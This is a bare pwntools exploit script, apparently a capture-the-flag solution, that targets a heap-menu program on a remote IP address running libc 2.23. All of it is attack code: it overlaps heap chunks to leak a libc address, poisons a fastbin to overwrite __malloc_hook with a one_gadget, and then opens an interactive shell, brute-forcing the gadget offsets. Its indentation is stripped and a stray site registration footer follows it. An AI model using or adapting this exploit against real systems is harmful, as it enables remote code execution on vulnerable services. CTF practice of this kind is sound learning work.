from pwn import *
def conn():
global libc,r
r = remote("1.95.36.136", 2080)
libc = ELF("./libc-2.23.so")
def add(x,y):
r.sendlineafter(b"Please Choice!\n",b"1")
r.sendlineafter(b"item:\n",b'aaaa')
r.sendlineafter(b"Please Input Size:\n",str(x))
r.sendlineafter(b"Emo!:\n",y)
def free(x):
r.sendlineafter(b"Please Choice!\n",b"2")
r.sendlineafter(b"Please Input index:\n",str(x))
def edit(x,y):
r.sendlineafter(b"Please Choice!\n",b"3")
r.sendlineafter(b"Please Input index:\n",str(x))
r.sendlineafter(b"Change EMo Content\n",y)
def show(x):
r.sendlineafter(b"Please Choice!\n",b"4")
r.sendlineafter(b"index:\n",str(x))
def pwn(i,j):
r.sendlineafter(b"Where are you from?\n",b"hello,everyone.Welcome to: Polar D&N:")
add(0xf8,b'0')
add(0xf8,b'0')
add(0xf8,b'0')
add(0xf8,b'0')
free(0)
edit(1,b'a'*0xf0+p64(0x100+0x100))
free(2)
add(0xf8,b'aaa')
show(1)
r.recvuntil(b"content:\n")
main = u64(r.recvline()[:-1].ljust(8,b"\x00"))
print("main=",hex(main))
base = main - 0x3c4b78
print("base=",hex(base))
malloc_hook = base + libc.sym["__malloc_hook"]
one = [0x4527a,0xf03a4,0xf1247]
onegadget = base + one[i]
realloc = base + libc.sym["realloc"]
print("onegadget=",hex(onegadget))
add(0x68,b'aaa')
free(2)
edit(1,p64(malloc_hook-0x23))
add(0x68,b'aaa')
exp = b'a'*(0x23-0x10-0x8)+p64(onegadget)+p64(realloc+j)
add(0x68,exp)
# gdb.attach(r)
r.sendlineafter(b"Please Choice!\n",b"1")
r.sendlineafter(b"item:\n",b'aaaa')
r.interactive()
for i in range(3):
for j in [0,2,4,6,8,10]:
try:
print(i,j)
conn()
pwn(i,int(j))
except:
r.close()
浙公网安备 33010602011771号